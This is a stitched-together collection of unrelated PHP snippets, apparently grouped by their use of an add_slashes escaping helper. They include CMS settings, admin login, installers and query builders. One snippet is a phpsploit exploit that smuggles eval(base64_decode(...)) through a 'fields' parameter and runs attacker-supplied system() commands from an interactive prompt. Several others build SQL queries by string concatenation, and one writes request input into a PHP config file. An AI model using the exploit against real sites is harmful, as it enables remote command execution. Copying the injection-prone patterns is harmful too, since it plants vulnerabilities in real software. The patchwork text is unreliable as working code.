/** * Метод отображения дополнительных настроек * */ function settingsCase() { global $AVE_Template; if ($_REQUEST['dop']) { $set = '<?'; foreach ($_REQUEST['GLOB'] as $k => $v) { switch ($GLOBALS['CMS_CONFIG'][$k]['TYPE']) { case 'bool': $v = $v ? 'true' : 'false'; break; case 'integer': $v = intval($v); break; case 'string': $v = "'" . add_slashes($v) . "'"; break; case 'dropdown': $v = "'" . add_slashes($v) . "'"; break; default: $v = "'" . add_slashes($v) . "'"; break; } $set .= "\t//" . $GLOBALS['CMS_CONFIG'][$k]['DESCR'] . "\r\n"; $set .= "\tdefine('" . $k . "'," . $v . ");\r\n\r\n"; } $set .= '?>'; file_put_contents(BASE_DIR . '/inc/config.inc.php', $set); reportLog($_SESSION['user_name'] . " - изменил дополнительные настройки системы", 2, 2); } $AVE_Template->assign('CMS_CONFIG', $GLOBALS['CMS_CONFIG']); $AVE_Template->assign('content', $AVE_Template->fetch('settings/settings_case.tpl')); }
function check_admin_login($login_arr) { $login_arr = add_slashes($login_arr); $username = $login_arr[username]; $password = sha1(SALT_VAR . $login_arr[password]); $roleid = $login_arr[roleid]; // $qry = "select * from admin where username='******' and password='******'"; // $row = mysql_query($qry); $row = single_row(ADMIN, "*", "roleid='" . $roleid . "' and`username`='" . $username . "' and `password`='" . $password . "'", "id", "desc", "", false); if ($row != false) { session_register($_SESSION[Adm_UserId]); session_register($_SESSION[Adm_RoleId]); session_register($_SESSION[Adm_Email]); session_register($_SESSION[Adm_UserNm]); session_register($_SESSION[Adm_Fname]); session_register($_SESSION[Adm_Lname]); $_SESSION[Adm_UserId] = $row[id]; $_SESSION[Adm_RoleId] = $row[roleid]; $_SESSION[Adm_Email] = $row[email]; $_SESSION[Adm_UserNm] = $row[username]; $_SESSION[Adm_Fname] = $row[fname]; $_SESSION[Adm_Lname] = $row[lname]; return true; } else { return false; } }
public function down() { $statement = DBManager::get()->prepare("\n SELECT name FROM `fleximport_tables`\n "); $statement->execute(); foreach ($statement->fetch(PDO::FETCH_COLUMN, 0) as $table_name) { DBManager::get()->exec("\n DROP TABLE IF EXISTS `" . add_slashes($table_name) . "`;\n "); } DBManager::get()->exec("\n\t DROP TABLE IF EXISTS `fleximport_tables`;\n\t "); }
/** * Слешевание (для глобальных массивов) * рекурсивно обрабатывает вложенные массивы * * @param array $array обрабатываемый массив * @return array обработанный массив */ function add_slashes($array) { reset($array); while (list($key, $val) = each($array)) { if (is_string($val)) { $array[$key] = addslashes($val); } elseif (is_array($val)) { $array[$key] = add_slashes($val); } } return $array; }
function main() { // :) $web = new phpsploit(); $web->agent('Mozilla Firefox'); // Hey ya :) head(); // Target $url = get_p('url', true); // Proxy options $prh = get_p('proxhost'); $pra = get_p('proxauth'); // Use a proxy ? if ($prh) { // host:ip $web->proxy($prh); // Authentication if ($pra) { $web->proxyauth($pra); } } // Single quote bypass $byp = "1');"; // PHP code $php = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));'; // Separator $s_sep = md5(rand(0, 1000000000) . 'HEY_YA'); $c_sep = "print('{$s_sep}');"; // Final PHP code $final = $byp . $c_sep . $php . $c_sep . 'exit();//'; // Welcome guess ! while (($cmd = cmd_prompt()) !== false) { // magic_quotes_gpc bypass $web->addheader('MypCode', base64_encode('system("' . add_slashes($cmd) . '");')); // Go =] $web->get($url . 'index.php?fields=' . to_char($final) . ',1'); // Result $res = explode($s_sep, $web->getcontent()); // Erf if (!isset($res[1])) { print "\nFailed"; exit(1); } else { if (empty($res[1])) { print "\nNo output: system() disabled OR cmd failed OR cmd without output"; } else { print "\n" . $res[1]; } } } return; }
function upd_rec($tab, $array, $where = "1=1", $disp = false) { $array = add_slashes($array); $qry = "update {$tab} set "; if (count($array) > 0) { foreach ($array as $k => $v) { $qry .= "{$k}='" . $v . "',"; } } $qry = trim($qry, ",") . " where " . $where; if ($disp) { echo $qry; } $err = mysql_query($qry); if (!$err) { echo mysql_error() . " - <b>" . $qry . "</b>"; return false; } else { return true; } }
function add_slashes($string) { if (!$GLOBALS['magic_quotes_gpc']) { if (is_array($string)) { foreach ($string as $key => $val) { $string[$key] = add_slashes($val); } } else { $string = addslashes($string); } } return $string; }
<?php session_start(); require "base.inc.php"; $data = $_POST; $data = guolv(add_slashes($data)); switch ($data['action']) { case 'user_up': unset($data['action']); if ($conn->post_update("" . DB_EXT . "user", $data, "kq_uniqueid='" . $_COOKIE['uid'] . "'")) { echo 'ok'; } else { echo ''; } break; case 'ly_add': is_login(@$_COOKIE['uid'], 0); $data['kq_uuid'] = uuid(); $data['kq_ctime'] = time(); $data['kq_ip'] = $_SERVER["REMOTE_ADDR"]; unset($data['action']); if ($conn->post_insert("" . DB_EXT . "fankui", $data)) { echo 'ok'; } else { echo ''; } break; case md5('user_add'): if ($data['chkfrom'] == @$_SESSION['add_input']) { $user = is_login(@$_COOKIE['uid']); unset($data['submit']);
$edit_value = $last_name; break; case "email": $value = $email; $edit_value = $email; break; case "alternate email": $value = $alt_email; $edit_value = $alt_email; break; case "phone": $value = add_slashes($phone); $edit_value = $phone; break; case "mobile": $value = add_slashes($mobile); $edit_value = $mobile; break; case "message": $value = nl2br(ucfirst($message)); $edit_value = $message; break; } echo display_contact($each_set->attribute, $value); echo generate_input($each_set->form_element, $each_set->options, $each_set->attribute, $each_set->searchable, $each_set->placeholder, $each_set->class_name, $each_set->style_name, $i, $each_set->is_required, $each->title_placeholder, $edit_value, "edit", $salutation); if ($i == 1) { ?> <div class="row dispRow"> <div class="column small-2"> <strong class="radius" > E-mail</strong> </div>
public function show_list($start = NULL, $limit = NULL) { try { $this->data['heading'] = addslashes(t("Manage Admin User")); //Package Name[@package] Panel Heading $this->session->unset_userdata('last_uri'); //generating search query// $arr_session_data = $this->session->userdata("arr_session"); if ($arr_session_data['searching_name'] != $this->data['heading']) { $this->session->unset_userdata("arr_session"); $arr_session_data = array(); } $search_variable = array(); //Getting Posted or session values for search// $s_search = isset($_POST["h_search"]) ? $this->input->post("h_search") : $this->session->userdata("h_search"); $search_variable["s_customer_name"] = $this->input->post("h_search") ? $this->input->post("s_customer_name") : $arr_session_data["s_customer_name"]; //end Getting Posted or session values for search// $s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1 "; if ($s_search == "advanced") { if ($search_variable["s_customer_name"] != "") { $s_where .= " AND CONCAT(n.s_first_name,' ',n.s_last_name) LIKE '%" . add_slashes($search_variable["s_customer_name"]) . "%' "; } $arr_session = array(); $arr_session["searching_name"] = $this->data['heading']; $arr_session["s_customer_name"] = $search_variable["s_customer_name"]; $this->session->set_userdata("arr_session", $arr_session); $this->session->set_userdata("h_search", $s_search); $this->data["h_search"] = $s_search; $this->data["s_customer_name"] = $search_variable["s_customer_name"]; } else { $s_where = " WHERE n.i_user_type > 2 AND n.i_id != 1"; // //Releasing search values from session// $this->session->unset_userdata("arr_session"); $this->session->unset_userdata("h_search"); $this->data["h_search"] = $s_search; $this->data["s_customer_name"] = ""; //end Storing search values into session// } unset($s_search, $arr_session, $search_variable); //Setting Limits, If searched then start from 0// if ($this->input->post("h_search")) { $start = 0; } else { $start = $this->uri->segment($this->i_uri_seg); } //end generating search query// //$this->i_admin_page_limit = 1; $limit = $this->i_admin_page_limit; $info = $this->mod_rect->fetch_multi($s_where, intval($start), $limit); $this->session->set_userdata('last_uri', $start); //Creating List view for displaying// $table_view = array(); //Table Headers, with width,alignment// $table_view["caption"] = addslashes(t("Manage Admin User")); $table_view["total_rows"] = count($info); $table_view["total_db_records"] = $this->mod_rect->gettotal_info($s_where); $table_view["detail_view"] = false; // to disable show details. $j = 0; $table_view["headers"][$j]["width"] = "30%"; $table_view["headers"][$j]["align"] = "left"; $table_view["headers"][$j]["val"] = addslashes(t("Name")); $table_view["headers"][++$j]["val"] = addslashes(t("Email")); $table_view["headers"][$j]["width"] = "25%"; $table_view["headers"][$j]["align"] = "left"; /*$table_view["headers"][++$j]["val"] = addslashes(t("User Type")); $table_view["headers"][$j]["width"] ="20%"; $table_view["headers"][$j]["align"] ="left";*/ $table_view["headers"][++$j]["val"] = addslashes(t("Status")); $table_view["headers"][$j]["width"] = "10%"; $table_view["headers"][$j]["align"] = "left"; //end Table Headers, with width,alignment// //Table Data// for ($i = 0; $i < $table_view["total_rows"]; $i++) { $i_col = 0; $table_view["tablerows"][$i][$i_col++] = encrypt($info[$i]["i_id"]); $table_view["tablerows"][$i][$i_col++] = $info[$i]["s_first_name"] . ' ' . $info[$i]["s_last_name"] . '<br>(Username: '******')'; $table_view["tablerows"][$i][$i_col++] = $info[$i]["s_email"]; //$table_view["tablerows"][$i][$i_col++] = $info[$i]["s_user_type"]; if ($info[$i]["i_status"] == 1) { $table_view["tablerows"][$i][$i_col++] = '<span class="label label-success" id="status_row_id_' . $info[$i]["i_id"] . '">Active</span>'; } else { $table_view["tablerows"][$i][$i_col++] = '<span class="label label-default" id="status_row_id_' . $info[$i]["i_id"] . '">Inactive</span>'; } $action = ''; if ($info[$i]["i_status"] == 1) { $action .= '<a data-toggle="tooltip" data-placement="bottom" title="Make Inactive" class="glyphicon glyphicon-ok" id="approve_img_id_' . $info[$i]["i_id"] . '_inactive" href="javascript:void(0);" rel="make_inactive"></a>'; } else { $action .= '<a data-toggle="tooltip" data-placement="bottom" title="Make Active" class="glyphicon glyphicon-ban-circle" id="approve_img_id_' . $info[$i]["i_id"] . '_active" href="javascript:void(0);" rel="make_active"></a>'; } if ($action != '') { $table_view["rows_action"][$i] = $action; } } //end Table Data// unset($i, $i_col, $start, $limit); $this->data["table_view"] = $this->admin_showin_table($table_view, TRUE); //Creating List view for displaying// $this->data["search_action"] = $this->pathtoclass . $this->router->fetch_method(); //used for search form action //echo $this->data["search_action"]; $this->render(); unset($table_view, $info); } catch (Exception $err_obj) { show_error($err_obj->getMessage()); } }
$database_name = $_POST['database_name']; } // Get table prefix // Find out if the user wants to install tables and data if (isset($_POST['install_tables']) && $_POST['install_tables'] == 'true') { $install_tables = true; } else { $install_tables = false; } // End database details code // Begin company name code // Get company name if (!isset($_POST['company_name']) || $_POST['company_name'] == '') { set_error('Please enter a company name'); } else { $company_name = add_slashes($_POST['company_name']); } // End website company name // Check if the user has entered a correct path if (!file_exists(accounting_scheme())) { set_error('It appears the accounting scheme does not exist'); } // Get admin email and validate it if (!isset($_POST['admin_email']) || $_POST['admin_email'] == '') { set_error('Please enter an email for the Administrator account'); } else { if (eregi("^([0-9a-zA-Z]+[-._+&])*[0-9a-zA-Z]+@([-0-9a-zA-Z]+[.])+[a-zA-Z]{2,6}\$", $_POST['admin_email'])) { $admin_email = $_POST['admin_email']; } else { set_error('Please enter a valid email address for the Administrator account'); }
require_once FUN_PATH . "global.func.inc.php"; require_once CLASS_PATH . "class_alert.inc.php"; /* 传入类型 */ if (isset($_POST['type'])) { $type = $_POST['type']; } else { exit("非法操作"); } $passarray = array(md5("weijintai"), md5("index_add")); //是否追加"//" if (in_array($type, $passarray)) { $data = $_POST; } else { $data = add_slashes($_POST); } //为空的取消 foreach ($data as $key => $value) { if (is_array($value)) { $data[$key] = $value; } else { if ($value) { $data[$key] = trim($value); } elseif ($value == '') { unset($data[$key]); } } } switch ($type) { /*管理员权限添加*/
function my_serialize($data) { return add_slashes(serialize(del_slashes($data))); }
define('TOA_ROOT', str_replace('\\', '/', substr(dirname(__FILE__), 0, -7))); define('CACHE_ROOT', TOA_ROOT . 'cache/'); define('PHP_TIME', time()); @header("content-Type: text/html; charset=utf-8"); $mtime = explode(' ', microtime()); $starttime = $mtime[0] + $mtime[1]; require TOA_ROOT . 'include/function_cache.php'; require TOA_ROOT . 'include/function_version.php'; require TOA_ROOT . 'include/function_global.php'; define('template', TOA_ROOT . 'template/default/'); if (!get_magic_quotes_gpc()) { $_GET = add_slashes($_GET); $_POST = add_slashes($_POST); $_COOKIE = add_slashes($_COOKIE); } $_FILES = add_slashes($_FILES); !$_SERVER['PHP_SELF'] && ($_SERVER['PHP_SELF'] = $_SERVER['SCRIPT_NAME']); $superadmin = ''; require TOA_ROOT . 'config.php'; require TOA_ROOT . 'include/class_mysql.php'; require TOA_ROOT . 'include/class_user.php'; require TOA_ROOT . 'include/class_config.php'; require TOA_ROOT . 'include/function_common.php'; require TOA_ROOT . 'include/excel_writer.class.php'; require TOA_ROOT . 'include/class_Utility.php'; require TOA_ROOT . 'include/class_ugcode.php'; require TOA_ROOT . 'include/sms.class.php'; require TOA_ROOT . 'include/class_ads.php'; require TOA_ROOT . 'include/word.class.php'; $db = new Mysql(); $db->connect(DB_HOST, DB_USER, DB_PWD, DB_NAME, DB_PCONNECT);
$database_name = $_POST['database_name']; } // Get table prefix if (preg_match('/[^a-z0-9_]+/i', $_POST['table_prefix'])) { // contains invalid characters (only a-z, A-Z, 0-9 and _ allowed to avoid problems with table/field names) set_error('Only characters a-z, A-Z, 0-9 and _ allowed in table_prefix.', 'table_prefix'); } else { $table_prefix = $_POST['table_prefix']; } $install_tables = true; // Begin website title code // Get website title if (!isset($_POST['website_title']) or $_POST['website_title'] == '') { set_error('Please enter a website title', 'website_title'); } else { $website_title = add_slashes($_POST['website_title']); } // End website title code // Begin admin user details code // Get admin username if (!isset($_POST['admin_username']) or $_POST['admin_username'] == '') { set_error('Please enter a username for the Administrator account', 'admin_username'); } else { $admin_username = $_POST['admin_username']; } // Get admin email and validate it if (!isset($_POST['admin_email']) or $_POST['admin_email'] == '') { set_error('Please enter an email for the Administrator account', 'admin_email'); } else { if (preg_match('/^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,4})$/i', $_POST['admin_email'])) { $admin_email = $_POST['admin_email'];
function add_slashes($data) { foreach ($data as $key => $value) { if (is_array($value)) { add_slashes($value); } else { if (!get_magic_quotes_gpc()) { $data[$key] = addslashes($value); } else { $data[$key] = $value; } } } return $data; }
/** * Creates a "SELECT FROM `table` WHERE .. conditions .." and returns the query results; * $conditions format: id=15&some_field='value' or as an array: array('id' => 15, 'some_field' => 'value') * $more_sql e.q. "ORDER BY id DESC" * * @param string $table * @param mixed $conditions * @param string $select_fields * @param string $more_sql * @return array */ function sqlSelectAll($table, $conditions = 1, $select_fields = '*', $more_sql = '') { $where = []; if (is_array($conditions)) { foreach ($conditions as $field => $value) { if ($this->_auto_add_slashes && is_string($value)) { $value = add_slashes($value); } $value = is_string($value) ? "'" . $value . "'" : $value; $where[] = "`{$field}`={$value}"; } } else { $where = explode('&', $conditions); } // build the query $query = "SELECT {$select_fields} FROM {$table} WHERE " . join(" AND ", $where) . " " . $more_sql; return $this->sqlFetchAll($query); }